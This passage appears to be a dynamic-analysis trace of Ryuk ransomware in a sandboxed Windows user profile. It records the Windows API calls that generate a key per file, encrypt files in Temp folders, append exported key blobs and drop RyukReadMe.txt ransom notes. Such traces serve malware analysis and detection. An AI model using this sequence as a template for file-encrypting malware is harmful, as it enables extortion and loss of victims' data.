pbData=0x2760000*, pdwDataLen=0x29ac078*=0x4313, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x4320) returned 1 [0143.681] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.681] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4320, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x4320, lpOverlapped=0x0) returned 1 [0143.681] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.681] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.681] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.681] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.681] CloseHandle (hObject=0x190) returned 1 [0143.713] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.717] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.717] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.717] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.717] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.717] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mUZmPGH.avi", dwFileAttributes=0x80) returned 1 [0143.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\mUZmPGH.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\muzmpgh.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.718] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=54381) returned 1 [0143.718] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=54381) returned 1 [0143.718] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xd34b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.718] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.718] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.718] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.718] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.719] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.719] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0xd46d, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0xd46d, lpOverlapped=0x0) returned 1 [0143.719] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.719] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0xd46d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0xd470) returned 1 [0143.720] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.720] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd470, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0xd470, lpOverlapped=0x0) returned 1 [0143.720] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.720] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.720] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.720] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.720] CloseHandle (hObject=0x190) returned 1 [0143.736] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.741] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.741] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.741] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.741] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.741] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\q5WdW.gif", dwFileAttributes=0x80) returned 1 [0143.741] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\q5WdW.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\q5wdw.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.742] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=79273) returned 1 [0143.742] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=79273) returned 1 [0143.742] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x13487, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.742] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.742] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.742] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.742] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.742] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.743] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x135a9, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x135a9, lpOverlapped=0x0) returned 1 [0143.744] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.744] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x135a9, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x135b0) returned 1 [0143.744] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.744] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x135b0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x135b0, lpOverlapped=0x0) returned 1 [0143.745] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.745] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.745] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.745] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.745] CloseHandle (hObject=0x190) returned 1 [0143.760] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.764] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.764] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.764] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.764] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.765] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\qFIHGj3 akqmITBuEK.jpg", dwFileAttributes=0x80) returned 1 [0143.765] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\qFIHGj3 akqmITBuEK.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\qfihgj3 akqmitbuek.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.765] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=9029) returned 1 [0143.765] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=9029) returned 1 [0143.765] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x2223, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.765] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.766] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.766] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.766] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.766] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.766] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2345, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x2345, lpOverlapped=0x0) returned 1 [0143.766] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.766] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x2345, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x2350) returned 1 [0143.766] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.766] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2350, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x2350, lpOverlapped=0x0) returned 1 [0143.766] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.766] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.766] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.767] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.767] CloseHandle (hObject=0x190) returned 1 [0143.783] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.787] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.787] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.787] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.787] SetLastError (dwErrCode=0x0) [0143.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.787] GetLastError () returned 0xb7 [0143.787] CloseHandle (hObject=0x190) returned 1 [0143.788] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0143.788] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.788] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.788] SetLastError (dwErrCode=0x0) [0143.788] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0143.789] GetLastError () returned 0x0 [0143.789] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0143.790] CloseHandle (hObject=0x194) returned 1 [0143.790] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0143.790] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0143.790] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0143.790] SetLastError (dwErrCode=0x0) [0143.790] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0143.792] GetLastError () returned 0x0 [0143.792] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0143.793] CloseHandle (hObject=0x198) returned 1 [0143.793] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0143.794] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0143.794] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0143.794] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0143.794] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0143.794] SetLastError (dwErrCode=0x0) [0143.794] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\03J4UQW0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\03j4uqw0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0143.795] GetLastError () returned 0x0 [0143.795] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0143.796] CloseHandle (hObject=0x198) returned 1 [0143.796] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0143.796] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0143.796] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.796] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat", dwFileAttributes=0x80) returned 1 [0143.797] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0143.797] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=32768) returned 1 [0143.797] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=32768) returned 1 [0143.797] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x7ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.797] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0143.799] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.799] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0143.799] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.799] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.799] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x8000, lpOverlapped=0x0) returned 1 [0143.800] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0143.800] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x8000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x8010) returned 1 [0143.801] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.801] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x8010, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x8010, lpOverlapped=0x0) returned 1 [0143.801] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0143.801] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0143.801] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0143.801] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0143.801] CloseHandle (hObject=0x198) returned 1 [0143.817] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.822] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.822] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.822] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0143.822] SetLastError (dwErrCode=0x0) [0143.822] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0143.822] GetLastError () returned 0xb7 [0143.822] CloseHandle (hObject=0x198) returned 1 [0143.822] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0143.822] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0143.822] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0143.822] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0143.822] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0143.823] SetLastError (dwErrCode=0x0) [0143.823] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\KETAJP6D\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\ketajp6d\\ryukreadme.txt"), 